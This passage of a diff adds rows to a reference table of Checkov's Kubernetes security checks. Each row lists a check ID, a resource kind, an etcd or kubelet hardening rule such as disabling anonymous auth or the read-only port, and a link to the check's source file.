[EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3576 | CKV_K8S_118 | resource | Deployment | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3577 | CKV_K8S_118 | resource | DeploymentConfig | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3578 | CKV_K8S_118 | resource | Job | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3579 | CKV_K8S_118 | resource | Pod | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3580 | CKV_K8S_118 | resource | PodTemplate | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3581 | CKV_K8S_118 | resource | ReplicaSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3582 | CKV_K8S_118 | resource | ReplicationController | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3583 | CKV_K8S_118 | resource | StatefulSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | 
[EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3584 | CKV_K8S_119 | resource | CronJob | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3585 | CKV_K8S_119 | resource | DaemonSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3586 | CKV_K8S_119 | resource | Deployment | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3587 | CKV_K8S_119 | resource | DeploymentConfig | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3588 | CKV_K8S_119 | resource | Job | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3589 | CKV_K8S_119 | resource | Pod | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3590 | CKV_K8S_119 | resource | PodTemplate | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | 
[EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3591 | CKV_K8S_119 | resource | ReplicaSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3592 | CKV_K8S_119 | resource | ReplicationController | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3593 | CKV_K8S_119 | resource | StatefulSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3594 | CKV_K8S_121 | resource | Pod | Ensure that the --peer-client-cert-auth argument is set to true | Kubernetes | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py) | +| 3595 | CKV_K8S_138 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3596 | CKV_K8S_138 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3597 | CKV_K8S_138 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | 
[KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3598 | CKV_K8S_138 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3599 | CKV_K8S_138 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3600 | CKV_K8S_138 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3601 | CKV_K8S_138 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3602 | CKV_K8S_138 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3603 | CKV_K8S_138 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3604 | CKV_K8S_138 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3605 | 
CKV_K8S_139 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3606 | CKV_K8S_139 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3607 | CKV_K8S_139 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3608 | CKV_K8S_139 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3609 | CKV_K8S_139 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3610 | CKV_K8S_139 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3611 | CKV_K8S_139 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3612 | CKV_K8S_139 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3613 | CKV_K8S_139 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3614 | CKV_K8S_139 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3615 | CKV_K8S_140 | resource | CronJob | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3616 | CKV_K8S_140 | resource | DaemonSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3617 | CKV_K8S_140 | resource | Deployment | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3618 | CKV_K8S_140 | resource | DeploymentConfig | Ensure that the --client-ca-file argument 
is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3619 | CKV_K8S_140 | resource | Job | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3620 | CKV_K8S_140 | resource | Pod | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3621 | CKV_K8S_140 | resource | PodTemplate | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3622 | CKV_K8S_140 | resource | ReplicaSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3623 | CKV_K8S_140 | resource | ReplicationController | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3624 | CKV_K8S_140 | resource | StatefulSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3625 | CKV_K8S_141 | resource | CronJob | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3626 | CKV_K8S_141 | 
resource | DaemonSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3627 | CKV_K8S_141 | resource | Deployment | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3628 | CKV_K8S_141 | resource | DeploymentConfig | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3629 | CKV_K8S_141 | resource | Job | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3630 | CKV_K8S_141 | resource | Pod | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3631 | CKV_K8S_141 | resource | PodTemplate | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3632 | CKV_K8S_141 | resource | ReplicaSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3633 | CKV_K8S_141 | resource | ReplicationController | Ensure that the --read-only-port argument is set to 0 | Kubernetes | 
[KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | 
+| 3634 | CKV_K8S_141 | resource | StatefulSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | 
+| 3635 | CKV_K8S_143 | resource | CronJob | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3636 | CKV_K8S_143 | resource | DaemonSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3637 | CKV_K8S_143 | resource | Deployment | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3638 | CKV_K8S_143 | resource | DeploymentConfig | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3639 | CKV_K8S_143 | resource | Job | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3640 | CKV_K8S_143 | 
resource | Pod | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3641 | CKV_K8S_143 | resource | PodTemplate | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3642 | CKV_K8S_143 | resource | ReplicaSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3643 | CKV_K8S_143 | resource | ReplicationController | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3644 | CKV_K8S_143 | resource | StatefulSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | 
+| 3645 | CKV_K8S_144 | resource | CronJob | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3646 | CKV_K8S_144 | resource | DaemonSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | 
[KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3647 | CKV_K8S_144 | resource | Deployment | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3648 | CKV_K8S_144 | resource | DeploymentConfig | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3649 | CKV_K8S_144 | resource | Job | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3650 | CKV_K8S_144 | resource | Pod | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3651 | CKV_K8S_144 | resource | PodTemplate | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3652 | CKV_K8S_144 | resource | ReplicaSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3653 | CKV_K8S_144 | resource | ReplicationController | Ensure that the --protect-kernel-defaults argument is set to true | 
Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3654 | CKV_K8S_144 | resource | StatefulSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | 
+| 3655 | CKV_K8S_145 | resource | CronJob | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3656 | CKV_K8S_145 | resource | DaemonSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3657 | CKV_K8S_145 | resource | Deployment | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3658 | CKV_K8S_145 | resource | DeploymentConfig | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3659 | CKV_K8S_145 | resource | Job | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3660 | CKV_K8S_145 | resource | Pod | Ensure that the --make-iptables-util-chains 
argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3661 | CKV_K8S_145 | resource | PodTemplate | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3662 | CKV_K8S_145 | resource | ReplicaSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3663 | CKV_K8S_145 | resource | ReplicationController | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3664 | CKV_K8S_145 | resource | StatefulSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | 
+| 3665 | CKV_K8S_146 | resource | CronJob | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3666 | CKV_K8S_146 | resource | DaemonSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3667 | CKV_K8S_146 | resource | Deployment | Ensure that the --hostname-override argument 
is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3668 | CKV_K8S_146 | resource | DeploymentConfig | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3669 | CKV_K8S_146 | resource | Job | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3670 | CKV_K8S_146 | resource | Pod | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3671 | CKV_K8S_146 | resource | PodTemplate | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3672 | CKV_K8S_146 | resource | ReplicaSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3673 | CKV_K8S_146 | resource | ReplicationController | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3674 | CKV_K8S_146 | resource | StatefulSet | Ensure that the --hostname-override argument is not set | Kubernetes | 
[KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | 
+| 3675 | CKV_K8S_147 | resource | CronJob | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3676 | CKV_K8S_147 | resource | DaemonSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3677 | CKV_K8S_147 | resource | Deployment | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3678 | CKV_K8S_147 | resource | DeploymentConfig | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3679 | CKV_K8S_147 | resource | Job | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3680 | CKV_K8S_147 | resource | Pod | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3681 | CKV_K8S_147 | resource | PodTemplate | Ensure 
that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3682 | CKV_K8S_147 | resource | ReplicaSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3683 | CKV_K8S_147 | resource | ReplicationController | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
